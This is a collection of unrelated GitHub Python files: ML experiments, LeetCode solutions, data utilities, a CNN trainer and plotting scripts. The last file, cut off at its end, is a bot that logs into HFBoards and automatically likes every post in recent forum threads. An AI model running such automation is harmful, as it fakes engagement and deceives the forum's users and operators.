__name__ == \"__main__\":\n main()\n","repo_name":"ADebor/cozmo_tracking","sub_path":"qr/qr_detector.py","file_name":"qr_detector.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"39522828080","text":"from os import listdir\nfrom os.path import exists, isdir, join\nfrom typing import List\n\nfrom wfa_planning_evaluation_framework.filesystem_wrappers import (\n filesystem_wrapper_base,\n)\nfrom wfa_planning_evaluation_framework.filesystem_wrappers import (\n filesystem_pathlib_wrapper,\n)\nfrom wfa_planning_evaluation_framework.data_generators.data_set import DataSet\n\n\nFsWrapperBase = filesystem_wrapper_base.FilesystemWrapperBase\nFsPathlibWrapper = filesystem_pathlib_wrapper.FilesystemPathlibWrapper\n\n\nclass DataDesign:\n \"\"\"A collection of DataSets used for evaluating an ExperimentalDesign.\"\"\"\n\n def __init__(self, dirpath: str, filesystem: FsWrapperBase = FsPathlibWrapper()):\n \"\"\"Constructor\n\n Args:\n dirpath: The directory on disk where the DataSets comprising this\n DataDesign will be stored.\n filesystem: The filesystem object that manages all file operations.\n \"\"\"\n self._dirpath = dirpath\n self._data_set_names = set()\n self._filesystem = filesystem\n\n self._filesystem.mkdir(dirpath, parents=True, exist_ok=True)\n for p in sorted(self._filesystem.glob(dirpath, \"*\")):\n if self._filesystem.is_dir(p):\n self._data_set_names.add(self._filesystem.name(p))\n\n @property\n def count(self) -> int:\n \"\"\"Number of DataSets represented in this design.\"\"\"\n return len(self._data_set_names)\n\n @property\n def names(self) -> List[str]:\n \"\"\"Returns a list of the DataSet names in this DataDesign.\"\"\"\n return sorted(self._data_set_names)\n\n def by_name(self, name: str) -> DataSet:\n \"\"\"Returns the DataSet having the given name.\"\"\"\n return DataSet.read_data_set(join(self._dirpath, name), self._filesystem)\n\n def add(self, data_set: DataSet) -> None:\n \"\"\"Adds a DataSet to this DataDesign.\"\"\"\n data_set_path = self._filesystem.joinpath(self._dirpath, data_set.name)\n if self._filesystem.exists(data_set_path):\n raise ValueError(\n \"This DataDesign already contains a DataSet with name {}\".format(\n data_set.name\n )\n )\n data_set.write_data_set(self._dirpath, filesystem=self._filesystem)\n self._data_set_names.add(data_set.name)\n","repo_name":"world-federation-of-advertisers/planning-evaluation-framework","sub_path":"src/data_generators/data_design.py","file_name":"data_design.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"22587890049","text":"#!/usr/bin/env python\n# https://www.gymlibrary.ml/pages/environments/classic_control/cart_pole\n\nimport json\nimport sys\nimport time\n\nimport numpy as np\nfrom llog import floora, floorʹ, log, plot\n\nif '--spin' in sys.argv:\n import gym\n\n sessions = []\n\n # 'Blackjack-v1', 'FrozenLake-v1', 'Taxi-v3', 'MountainCar-v0', 'FrozenLake-v1', 'Pendulum-v1',\n # 'Acrobot-v1', 'MountainCarContinuous-v0'\n env = gym.make('CartPole-v1')\n\n while len(sessions) < 1234:\n env.reset()\n actions = []\n observations = []\n for frame in range(234):\n if '--render' in sys.argv:\n env.render()\n time.sleep(.02)\n\n action = int(env.action_space.sample())\n observation, reward, done, info = env.step(action)\n\n actions.append(action)\n observations.append(observation.tolist())\n\n if done:\n break\n\n sessions.append((actions, observations))\n\n env.close()\n\n open('cartpole.json', 'w').write(json.dumps(sessions))\n\n\ndef load_inputs():\n sessions = json.loads(open('cartpole.json', 'r').read())\n inputs, outputs = [], []\n for actions, observations in sessions:\n for j in range(1, len(observations)):\n inputs.append([*observations[j - 1], actions[j]])\n outputs.append(observations[j])\n return sessions, inputs, outputs\n\n\ndef elm():\n '''infer with ELM'''\n\n sys.path.insert(0, '../elm')\n import elm\n sys.path.remove('../elm')\n\n # infer: elm (stateⱼ₋₁, actionⱼ) = stateⱼ\n _, inputs, outputs = load_inputs()\n weights, bias, β = elm.train(31, inputs, outputs)\n # 3 .. 0.27\n # 31 .. 0.22\n # 314 .. 0.22\n # 1234 .. 0.22\n\n predictions = []\n for input in inputs:\n predictions.append(elm.infer(weights, bias, β, input))\n\n mse = np.square(np.subtract(outputs, predictions)).mean()\n log(floorʹ(mse))\n\n\ndef jax():\n '''infer with JAX'''\n\n import jax\n import jax.numpy as jnp\n\n sys.path.insert(0, '../math')\n import jax_adabelief as jb\n sys.path.remove('../math')\n\n def predict(params, input):\n previous_velocity, action = input[1], input[4]\n inc = jax.lax.cond(action, lambda: params[0], lambda: -params[0])\n velocity = previous_velocity + inc\n return velocity\n\n batched_predict = jax.vmap(predict, in_axes=(None, 0))\n\n def loss(params, xs, ys):\n pred = batched_predict(params, xs)\n return jnp.mean((pred - ys)**2)\n\n _, inputs, outputs = load_inputs()\n xs = jnp.array(inputs)\n ys = jnp.array([o[1] for o in outputs])\n\n def plot_loss():\n lossˉ = jax.jit(loss).lower(jnp.array([0.1]), xs, ys).compile()\n a = [[' ' for x in range(111)] for y in range(5)]\n pxs, pys = [], []\n for p in range(9):\n pxs.append(p / 10)\n pys.append(lossˉ(jnp.array([p / 10]), xs, ys))\n map = plot(a, pxs, pys)\n print('\\n'.join(''.join(y) for y in a))\n\n plot_loss()\n\n m = jnp.zeros(1)\n s = jnp.zeros(1)\n rkey = jax.random.PRNGKey(1)\n params = jax.random.normal(rkey, (1,))\n\n def optimise(epoch, m, s, params, xs, ys):\n lossʹ, grads = jax.value_and_grad(loss)(params, xs, ys)\n m, s, params = jb.adabeliefʹ(epoch, grads, m, s, params)\n return m, s, params, lossʹ\n\n optimiseˉ = jax.jit(optimise).lower(1, m, s, params, xs, ys).compile()\n for epoch in range(314):\n m, s, params, lossʹ = optimiseˉ(epoch, m, s, params, xs, ys)\n log(epoch, params, np.format_float_positional(lossʹ))\n\n\nif '--xgboost' in sys.argv: # infer with xgboost\n import xgboost as xgb\n _, inputs, outputs = load_inputs()\n velocity = [o[1] for o in outputs]\n param = {'max_depth': 3}\n dtrain = xgb.DMatrix(inputs, label=velocity)\n best = xgb.train(param, dtrain, evals=[(dtrain, 'train')], 
num_boost_round=314)\n for count, (input, expected) in enumerate(zip(inputs, outputs)):\n prediction = best.predict(xgb.DMatrix([input]))[0]\n log(f\"prediction {prediction} expected {expected[1]}\")\n if 32 < count:\n break\n\n gv = xgb.to_graphviz(best)\n open('velocity.pdf', 'wb').write(gv.pipe())\n\nif '--tf' in sys.argv: # Inference with TF\n from tensorflow import keras\n from tensorflow.keras import layers\n\n tf_inputs = keras.Input(shape=(5,), name=\"state-and-action\")\n x = layers.Dense(314, activation=\"relu\", name=\"dense_1\")(tf_inputs)\n x = layers.Dense(314, activation=\"relu\", name=\"dense_2\")(x)\n tf_outputs = layers.Dense(4, activation=\"softmax\", name=\"state-prediction\")(x)\n # 3 .. 0.18\n # 31 .. 0.18\n # 314 .. 0.18\n\n model = keras.Model(inputs=tf_inputs, outputs=tf_outputs)\n\n model.compile(optimizer=keras.optimizers.Adam(learning_rate=0.1), loss=keras.losses.MeanSquaredError())\n\n _, inputs, outputs = load_inputs()\n inputs = np.vstack(inputs).astype('float32')\n outputs = np.vstack(outputs).astype('float32')\n\n # https://www.tensorflow.org/api_docs/python/tf/keras/Model#fit\n history = model.fit(inputs[3:], outputs[3:], validation_split=0.01, epochs=2022)\n\n predictions = model.predict(inputs)\n log(outputs[0], '-', predictions[0])\n\n mse = np.square(np.subtract(outputs, predictions)).mean()\n log(floorʹ(mse))\n\nif '--neat' in sys.argv: # Inference with NEAT\n import neat\n\n config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction, neat.DefaultSpeciesSet,\n neat.DefaultStagnation, 'neat.conf')\n _, inputs, outputs = load_inputs()\n\n for output_selection in range(4):\n\n p = neat.Population(config)\n\n #p.add_reporter(neat.StdOutReporter(False))\n\n\n def eval_genomes(genomes, config):\n for genome_id, genome in genomes:\n genome.fitness = 4.0\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n for count, (input, expected) in enumerate(zip(inputs, outputs)):\n prediction = net.activate(input)\n genome.fitness -= np.square(np.subtract(prediction[0], expected[output_selection])).mean()\n if 123 < count:\n break\n\n winner = p.run(eval_genomes)\n\n log(f\"output_selection {output_selection} genome:\\n{winner}\")\n\n winner_net = neat.nn.FeedForwardNetwork.create(winner, config)\n\n for count, (input, expected) in enumerate(zip(inputs, outputs)):\n prediction = winner_net.activate(input)\n expected = floorʹ(expected[output_selection])\n log(f\"output_selection {output_selection} expected {expected} predicted {floorʹ(prediction[0])}\")\n if 32 < count:\n break\n\nif '--pgm' in sys.argv: # Inference with PGM\n import pandas as pd\n from pgmpy.estimators import MaximumLikelihoodEstimator\n from pgmpy.models import BayesianNetwork\n\n model = BayesianNetwork([\n (\"Action\", \"VelocityChange\"),\n ])\n\n sessions = json.loads(open('cartpole.json', 'r').read())\n actions, veloΔ = [], []\n for acs, obs in sessions:\n for j in range(1, len(obs)):\n actions.append(acs[j])\n veloΔ.append(floorʹ(obs[j][1] - obs[j - 1][1]))\n\n data = {'Action': actions, 'VelocityChange': veloΔ}\n data = pd.DataFrame(data=data)\n\n model.fit(data=data, estimator=MaximumLikelihoodEstimator)\n print(model.get_cpds(\"VelocityChange\"))\n\nif __name__ == '__main__':\n if '--elm' in sys.argv:\n elm()\n elif '--jax' in sys.argv:\n jax()\n else:\n 
jax()\n","repo_name":"ArtemGr/bounty","sub_path":"data/gym/cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":7031,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"41720251515","text":"class Solution:\n def subdomainVisits(self, cpdomains: List[str]) -> List[str]:\n dic={}\n for i in cpdomains:\n i=i.split()\n nu=int(i[0])\n we=i[1]\n we=we.split('.')\n for j in range(len(we)):\n si='.'.join(we[j:len(we)])\n dic[si]=dic.get(si,0)+nu\n li=[]\n for k,v in dic.items():\n li.append(str(v)+' '+k)\n return li\n","repo_name":"EbaAdisu/A2SV-PROJECTS","sub_path":"DIV3/811. Subdomain Visit Count/subdomainvisit.py","file_name":"subdomainvisit.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18488873515","text":"from pathlib import Path\nimport pandas as pd\nfrom pandas.core.frame import DataFrame\nfrom ..utils.logger import Logger\n\n\nclass Outliers:\n\n def __init__(self,df: DataFrame):\n self.logger = Logger(__name__, __name__ == '__main__')\n self.df = df\n \n\n def detect(self):\n self.logger.info(f\"Started outlier detection.\")\n self.logger.info(f\"Dataset shape before outlier removal : {self.df.shape}\")\n num_cols = ['kms_driven','price']\n\n for col in num_cols:\n\n max_val = self.df[col].quantile(.99)\n\n min_val = self.df[col].quantile(.1)\n\n self.logger.info(f\"Min/Max Range for {col} is {min_val} / {max_val}\")\n\n total_outs = self.df[~(self.df[col] <= max_val)].shape[0]\n\n self.logger.info(f\"Total outliers detected for {col} is {total_outs}\")\n\n self.df = self.df[(self.df[col] <= max_val)]\n\n self.logger.info(f\"Outliers removed for {col} based on min/max quantile of (.1, .99).\")\n\n # remove bikes which has age more than 15 yrs\n self.df = self.df[self.df['age'] <= 16]\n\n self.logger.info(f\"Dataset shape after outlier removal : {self.df.shape}\")\n\n self.logger.info(f\"Finished outlier detection.\")\n\n return self.df\n\n\n def _get_num_features(self):\n return self.df.select_dtypes(exclude='object').columns\n\n\nif __name__ == '__main__':\n Outliers('data/processed/data.csv').detect()\n\n\n","repo_name":"ropali/used_bike_price_prediction","sub_path":"src/features/outliers.py","file_name":"outliers.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"40956259057","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nsave = False if input(\"Save figures? \").lower() == 'no' else True\n\ntac = 0.234\ntag = 0.456\ntl = 0.0125\ntw = 0.0125\nbw = 80\n\ntmpMx = np.arange(2, 10)\ntmpMy = np.arange(2, 10)\nMsx, Msy = np.meshgrid(tmpMx, tmpMy)\n\n# Shared Memory\n\ndef AI_shared(Mx, My):\n return (2*Mx * My) / (4.0 * 4.0 + 4.0 * Mx * My)\n\ndef perf_shared(Mx, My):\n return AI_shared(Mx, My) * bw\n\nPers = np.zeros((len(tmpMx),len(tmpMy)))\nfor i in range(8):\n for j in range(8):\n Pers[i,j] = perf_shared(tmpMx[i], tmpMy[j])\n\nfig = plt.figure(figsize=(20,10))\nax = fig.gca(projection='3d')\nax.set_xlabel(\"Mx\")\nax.set_ylabel(\"My\")\nax.set_zlabel(\"Performance (GFlops/s)\")\nsurf = ax.plot_surface(Msx, Msy, Pers, cmap=\"viridis\")\nfig.colorbar(surf)\nif save == True:\n plt.savefig(\"../figures/theoretical_shared_performance.png\",format=\"png\")\nplt.show()\n\n# Constant Memory\n\ndef AI_constant(Mx, My):\n return (2*Mx * My) / (4.0 * 4.0)\n\ndef perf_constant(Mx, My):\n return AI_constant(Mx, My) * bw\n\nPers = np.zeros((len(tmpMx),len(tmpMy)))\nfor i in range(8):\n for j in range(8):\n Pers[i,j] = perf_constant(tmpMx[i], tmpMy[j])\n\nfig = plt.figure(figsize=(20,10))\nax = fig.gca(projection='3d')\nax.set_xlabel(\"Mx\")\nax.set_ylabel(\"My\")\nax.set_zlabel(\"Performance (GFlops/s)\")\nsurf = ax.plot_surface(Msx, Msy, Pers, cmap=\"viridis\")\nfig.colorbar(surf)\nif save == True:\n plt.savefig(\"../figures/theoretical_constant_performance.png\",format=\"png\")\nplt.show()\n\n# Adaptive tiling (1x21 tiling)\n\ndef AI_adaptive(Mx, My, T):\n return (2*Mx * My * T) / (4.0*(2.0 * 4.0 + (T-2)*2.0))\n\ndef perf_adaptive(Mx, My,T):\n return AI_adaptive(Mx, My,T) * bw\n\ntiling = 21\nPers = np.zeros((len(tmpMx),len(tmpMy)))\nfor i in range(8):\n for j in range(8):\n Pers[i,j] = perf_adaptive(tmpMx[i], tmpMy[j], tiling)\n\nfig = plt.figure(figsize=(20,10))\nax = fig.gca(projection='3d')\nax.set_xlabel(\"Mx\")\nax.set_ylabel(\"My\")\nax.set_zlabel(\"Performance (GFlops/s)\")\nsurf = ax.plot_surface(Msx, Msy, Pers, cmap=\"viridis\")\nfig.colorbar(surf)\nif save == True:\n plt.savefig(\"../figures/theoretical_tiling_performance.png\",format=\"png\")\nplt.show()\n","repo_name":"burklight/GPU-Accelerated-Edge-Detection","sub_path":"tests/plot_theoretical_ai.py","file_name":"plot_theoretical_ai.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"17134840318","text":"from PyQt5.QtGui import QPixmap\nfrom uiElements.common import Common\nfrom PIL import Image\nfrom PyQt5.QtWidgets import *\n\n\nclass ImageCodes(Common):\n def __init__(self, bounds, curr_window, img_name):\n super().__init__(bounds, curr_window, img_name)\n # Generate empty image dimension (w and h)\n # self.size = (int(self.x_max - self.x_min), int(self.y_max - self.y_min))\n\n def getImage(self, id):\n Image.new(mode=\"RGB\", size=self.size, color=0).save(f\"images/img_{id}.jpg\")\n label = QLabel(self.curr_window)\n label.setGeometry(self.x_min, self.y_min, self.x_max-self.x_min, self.y_max-self.y_min)\n label.setPixmap(QPixmap(f\"images/img_{id}.jpg\"))\n # Let's write these codes to our bare codes file\n with open(f\"codes/{self.image_name}.py\", 'a') as code:\n code.write(f'\\n# Codes for the image placeholder\\n')\n code.write(f'Image.new(mode=\"RGB\", size={self.size}, color={0}).save(f\"images/img_{id}.jpg\")\\n')\n code.write(f'label = QLabel(curr_window)\\n')\n code.write(f'label.setGeometry({self.x_min}, {self.y_min}, {self.x_max - self.x_min}, {self.y_max - self.y_min})\\n')\n code.write(f'label.setPixmap(QPixmap(f\"images/img_{id}.jpg\"))\\n')\n return self.curr_window\n","repo_name":"muga01/CodeGenerator","sub_path":"uiElements/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"16104433219","text":"import os\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms, datasets\n\nfrom dataset import *\nfrom copy import copy\n\nimport warnings\nimport time\n\nwarnings.filterwarnings('ignore')\n\n\ndef train(args):\n new_train = args.train_dir\n\n new_val = args.new_dir # processed SPDS-RPS\n new_val = preprocess(args.val_dir, new_val) # SPDS-RPS validation processe\n\n num_train = len(os.listdir(os.path.join(new_train, 'rock/'))) + \\\n len(os.listdir(os.path.join(new_train,'paper/'))) + \\\n len(os.listdir(os.path.join(new_train, 'scissors/')))\n\n num_val = len(os.listdir(os.path.join(args.val_dir, 'rock/'))) + \\\n len(os.listdir(os.path.join(args.val_dir, 'paper/'))) + \\\n len(os.listdir(os.path.join(args.val_dir, 'scissors/'))) \n\n print(\"%d training images, %d validation images\" % (num_train, num_val))\n\n transform = transforms.Compose([ToTensor()])\n dataset_train = CustomDataset(new_train, transform=transform, train = True)\n loader_train = DataLoader(dataset_train, batch_size = args.batchsize, \\\n shuffle=True, collate_fn=dataset_train.custom_collate_fn, num_workers=8)\n \n dataset_val = CustomDataset(new_val, transform=transform) #SPDS-RPS\n loader_val = DataLoader(dataset_val, batch_size=num_val, \\\n shuffle=True, collate_fn=dataset_val.custom_collate_fn, num_workers=8)\n \n # Define Model\n model = nn.Sequential(nn.Conv2d(1, 32, 2, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n nn.Conv2d(32, 64, 2, padding=1),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n nn.Conv2d(64, 128, 2, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n nn.Conv2d(128, 256, 2, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n nn.Conv2d(256, 512, 2, padding=1),\n nn.BatchNorm2d(512),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=1),\n nn.Dropout(0.3),\n nn.Conv2d(512, 256, 2, padding=1),\n nn.BatchNorm2d(256),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n nn.Dropout(0.3),\n nn.Conv2d(256, 128, 2, padding=1),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=2),\n nn.Conv2d(128, 64, 2, padding=0),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=1),\n torch.nn.Flatten(),\n nn.Linear(64, 1000, bias = True),\n nn.Dropout(0.5),\n nn.Linear(1000, 3, bias = True),\n )\n \n soft = nn.Softmax(dim=1)\n \n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(\"Current device:\", device)\n \n model.to(device)\n \n # Define the loss\n criterion = nn.CrossEntropyLoss().to(device)\n \n # Define the optimizer\n optim = torch.optim.SGD(model.parameters(), lr = 0.01) # 0.01\n \n best_epoch = 0\n accuracy_save = np.array(0)\n for epoch in range(args.epochs):\n\n model.train()\n train_loss = []\n correct_train = 0\n correct_val = 0\n correct_batch = 0\n s = time.time()\n\n for batch, data in enumerate(loader_train, 1):\n label = data['label'].to(device)\n input = data['input'].to(device)\n\n output = model(input)\n label_pred = soft(output).argmax(1)\n \n optim.zero_grad()\n \n loss = criterion(output, label)\n loss.backward()\n \n optim.step()\n \n correct_train += (label == label_pred).float().sum()\n \n train_loss += [loss.item()]\n\n accuracy_train = correct_train / num_train\n \n correct_val = 0\n accuracy_tmp = np.array(0)\n with torch.no_grad():\n\n model.eval() \n val_loss = []\n v = time.time()\n\n for batch, data in enumerate(loader_val, 1):\n\n label_val = data['label'].to(device)\n input_val = data['input'].to(device)\n \n output_val = 
model(input_val)\n \n label_val_pred = soft(output_val).argmax(1)\n \n correct_val += (label_val == label_val_pred).float().sum()\n \n loss = criterion(output_val, label_val)\n val_loss += [loss.item()]\n \n end = time.time()\n accuracy_val = correct_val / num_val\n \n # Save the best model wrt val accuracy\n accuracy_tmp = accuracy_val.cpu().numpy()\n if accuracy_save < accuracy_tmp:\n best_epoch = epoch+1\n accuracy_save = accuracy_tmp.copy()\n torch.save(model.state_dict(), 'param.data')\n print(\".......model updated (epoch = \", epoch+1, \")\")\n \n print(\"epoch: %04d / %04d | train loss: %.5f | train accuracy: %.4f | validation loss: %.5f | validation accuracy: %.4f | time: %.2f seconds | validation: %.2f seconds\" %\n (epoch+1, args.epochs, np.mean(train_loss), accuracy_train, np.mean(val_loss), accuracy_val, time.time() - s, end - v))\n \n print(\"Model with the best validation accuracy is saved.\")\n print(\"Best epoch: \", best_epoch)\n print(\"Best validation accuracy: \", accuracy_save)\n print(\"Done.\")\n \n","repo_name":"jooeunkiim/spds-rps","sub_path":"Task3/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"24061014740","text":"def maxArea(height):\n if len(height) <= 1:\n return 0\n\n left_cursor = 0\n right_cursor = len(height) - 1\n max_area = 0\n\n while left_cursor != right_cursor:\n area = min(height[left_cursor], height[right_cursor]) * (right_cursor - left_cursor)\n if area > max_area:\n max_area = area\n\n if height[left_cursor] < height[right_cursor]:\n left_cursor += 1\n else:\n right_cursor -= 1\n\n return max_area\n\nprint(f\"maxArea([1, 8, 6, 2, 5, 4, 8, 3, 7]): correct: {maxArea([1, 8, 6, 2, 5, 4, 8, 3, 7]) == 49}\")\n","repo_name":"DaMinaup6/algorithm-exercises","sub_path":"leetcode/medium/11_contains_with_most_water.py","file_name":"11_contains_with_most_water.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"12467695697","text":"# def return_original(arr):\r\n# \tfor i in range(len(arr)):\r\n# \t\tif arr[i]*2 in arr:\r\n# \t\t\treturn arr[:(arr[i]*2)+1]\r\n# \t\telse:\r\n# \t\t\treturn -1\r\nfrom collections import Counter\r\nclass Solution:\r\n def findOriginalArray(self, changed):\r\n if len(changed) % 2 == 1:\r\n return []\r\n data = Counter(changed)\r\n result = []\r\n for k in sorted(data):\r\n if data[k] < 0:\r\n return []\r\n value = k * 2\r\n while data[k] > 0:\r\n if data[value] == 0:\r\n return []\r\n result.append(k)\r\n data[k] -= 1\r\n data[value] -= 1\r\n return result\r\n\r\narr = [1, 3, 4, 5, 6, 2, 6, 8, 10, 12]\r\nsol = Solution()\r\nprint(sol.findOriginalArray(arr))","repo_name":"Parvez13/Placement_Assignment-Sohail_Parvez-","sub_path":"Pre_Placement/Assignment/Arrays2D_Lecture_3/question_6.py","file_name":"question_6.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"75021664373","text":"from AoC2021.day_15 import navigate_cave, navigate_giga_cave\nfrom AoC2021.util import parse_chiton_cave\n\n\ndef main():\n print('Welcome to Day 15 of Advent of Code 2021')\n\n cave, row_len = parse_chiton_cave('./data/day_15.txt')\n\n risk_level = navigate_cave(cave, row_len)\n\n print(f'Risk Level: {risk_level!r}')\n\n giga_risk = navigate_giga_cave(cave, row_len)\n\n print(f'Giga Risk: {giga_risk!r}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"alyons/aoc_python","sub_path":"main_15.py","file_name":"main_15.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"23923453436","text":"from bs4 import BeautifulSoup\nimport time\nimport requests\nimport logging\n\n\nclass HfBoards:\n BASE = 'https://hfboards.mandatory.com'\n logged_in = False\n\n def __init__(self, username, password):\n \"\"\"Creates a HFboards Requests session and logs supplied username in\n\n Parameters\n ----------\n username : str\n Hfboards username\n password : str\n Hfboards password\n \"\"\"\n self.hf_session = requests.Session()\n resp = self.hf_session.get(self.BASE)\n\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}\n payload = {\"login\": username,\n \"register\": \"0\",\n \"password\": password,\n \"remember\": \"1\",\n \"cookie_check\": \"1\",\n \"redirect\": \"/\"}\n\n resp = self.hf_session.post(self.BASE + '/login/login', data=payload, headers=headers, stream=False)\n\n self.visited_threads = set()\n if self.__is_good_response(resp):\n # print(requests.utils.dict_from_cookiejar(self.hf_session.cookies))\n soup = BeautifulSoup(resp.content, \"html.parser\")\n self.logout_url = soup.find('a', {'class': 'LogOut'})['href']\n self.logged_in = True\n\n def logout(self):\n \"\"\"Ends current HfBoards session by logging out\n \"\"\"\n if self.logged_in:\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'}\n\n resp = self.hf_session.get(self.BASE + '/' + self.logout_url, headers=headers)\n\n self.hf_session.close()\n\n def __is_good_response(self, resp):\n \"\"\"\n Determines is the Requests response was valid\n\n Parameters\n ----------\n resp : Response Object\n\n Returns\n ----------\n Returns True if the response seems to be HTML, False otherwise.\n \"\"\"\n content_type = resp.headers['Content-Type'].lower()\n return (resp.status_code in [200]\n and content_type is not None\n and content_type.find('html') > -1)\n\n def __like_posts(self, xf_token, thread_url, posts):\n \"\"\"Likes posts within a thread page\n\n Parameters\n ----------\n xf_token : str\n xenforo token hidden in page\n thread_url : str\n url of the thread to like\n posts : bs4.element.Tag\n Beautiful Soup Tags containing urls of post to like on a page\n \"\"\"\n if self.logged_in:\n\n cookies = requests.utils.dict_from_cookiejar(self.hf_session.cookies)\n\n cookie_header = ''\n\n for key, value in cookies.items():\n cookie_header += \"=\".join([key, value]) + ';'\n\n headers = {\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',\n 'cookie': cookie_header,\n 'dnt': '1',\n 'origin': 'https://hfboards.mandatory.com',\n 'referer': thread_url,\n 'x-ajax-referer': thread_url,\n 'x-requested-with': 'XMLHttpRequest',\n }\n\n payload = {\"_xfNoRedirect\": '1',\n \"_xfToken\": xf_token,\n \"_xfResponseType\": 'json',\n \"_xfRequestUri\": thread_url,\n }\n\n for count, like in enumerate(posts):\n url = self.BASE + '/' + like['href']\n logger.info(\"Liking post: \" + url)\n resp = self.hf_session.post(url=url, data=payload, headers=headers)\n time.sleep(2)\n\n def like_thread(self, thread_id, live):\n \"\"\"Iterates over pages in a thread and gathers all posts to like.\n calls __like_posts for each thread page\n Parameters\n ----------\n thread_id : str\n ex. threads/chad-larose.1474771/\n live : bool\n Is this a live thread? 
[True/False]\n \"\"\"\n if self.logged_in:\n # threads are in the form https://hfboards.mandatory.com/threads/thread-id\n url = '/'.join([self.BASE, thread_id])\n resp = self.hf_session.get(url)\n\n if self.__is_good_response(resp):\n\n soup = BeautifulSoup(resp.content, \"html.parser\")\n\n nav = soup.find('div', {'class': 'PageNav'})\n\n xf_token = soup.find(name='input', attrs={'name': '_xfToken'})['value']\n\n posts = soup.find_all('a', {'class': 'LikeLink item control like'})\n\n logger.info('Liking Page: ' + url)\n self.__like_posts(xf_token, url, posts)\n\n try:\n if nav is not None:\n thread_pages = int(nav['data-last'])\n curr_page = int(nav['data-page'])\n\n if curr_page and curr_page != thread_pages:\n url_lst = url.split('/')\n\n if url_lst[-1] == 'unread':\n url = '/'.join(url_lst[:-1])\n\n for pg_num in range(curr_page + 1, thread_pages + 1):\n time.sleep(2)\n\n if live:\n page_url = url + '?page=' + str(pg_num)\n else:\n page_url = url + '/page-' + str(pg_num)\n\n resp = self.hf_session.get(page_url)\n\n soup = BeautifulSoup(resp.content, \"html.parser\")\n\n logger.info(\"Liking Page: \" + page_url)\n\n xf_token = soup.find(name='input', attrs={'name': '_xfToken'})['value']\n\n posts = soup.find_all('a', {'class': 'LikeLink item control like'})\n\n self.__like_posts(xf_token, page_url, posts)\n\n except KeyError:\n pass # sometimes a nav won't exist or be completely populated, ok to ignore... ie keyerror data-last\n\n def like_forum(self, forum, num_threads):\n \"\"\" Likes all posts in num_threads of most recently posted threads (excluding stickied)\n\n Parameters\n ----------\n fourm : str\n HfBoards Fourm Id\n ex: carolina-hurricanes.26\n num_threads : int\n Number of threads to like within forum\n \"\"\"\n if self.logged_in:\n\n resp = self.hf_session.get(self.BASE + '/forums/' + forum)\n\n if self.__is_good_response(resp):\n soup = BeautifulSoup(resp.content, \"html.parser\")\n\n threads = soup.find_all('a', {'class': 'PreviewTooltip'})\n\n # only want threads that aren't stickied\n threads = [item['href'] for item in threads if not item.find_parents(\"li\", class_='sticky')]\n\n for thread in threads[:num_threads]:\n\n # We want to make sure we have looped through each thread page once before checking for new posts\n # strip off /unread from the url and only add it back once it is a part of our set.\n if thread[-1] == '/':\n thread = thread[:-1]\n if thread[-6:] == 'unread':\n thread = thread[:-7]\n\n if thread in self.visited_threads:\n thread = thread + '/unread'\n else:\n self.visited_threads.add(thread)\n\n if thread[-4:] == 'live':\n self.like_thread(thread, True)\n else:\n self.like_thread(thread, False)\n\n time.sleep(10)\n\nif __name__ == \"__main__\":\n\n logging.basicConfig(filename='ilikeyou.log', format='%(asctime)s %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.DEBUG)\n logger = logging.getLogger(__name__)\n\n conn = HfBoards('username', 'password')\n\n while True:\n logger.info('liking some threads...')\n 